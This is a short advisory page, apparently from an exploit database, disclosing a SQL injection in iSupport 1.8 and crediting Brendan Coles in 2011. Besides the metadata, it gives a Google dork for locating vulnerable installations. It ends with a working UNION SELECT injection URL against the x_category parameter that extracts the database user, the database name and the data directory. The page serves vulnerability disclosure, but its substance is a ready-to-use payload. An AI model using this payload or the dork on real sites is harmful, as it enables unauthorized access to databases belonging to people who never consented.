iSupport 1.8 SQL Injection Vulnerability
| EKU-ID: 605 | CVE: | OSVDB-ID: |
| Author: Brendan Coles | Published: 2011-06-24 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 605 | CVE: | OSVDB-ID: |
| Author: Brendan Coles | Published: 2011-06-24 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
iSupport 1.8 SQL Injection Vulnerability
# Date: 2011-06-23
# Author: Brendan Coles <bcoles@gmail.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>>
# Advisory: http://itsecuritysolutions.org/2011-06-23-iSupport-1.8-SQL-Injection-Vulnerability/
# Software: iSupport
# Version: <= 1.8
# Homepage: http://www.idevspot.com/iSupport.php
# Google Dork: "Powered by [ iSupport 1.8 ]"
# Vendor: idevSpot
# Homepage: http://www.idevspot.com/
# Notified: Unnotified
# SQL Injection:
http://localhost/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=null union select null,concat(user(),0x3a,database(),0x3a,@@datadir),null,null,null,null--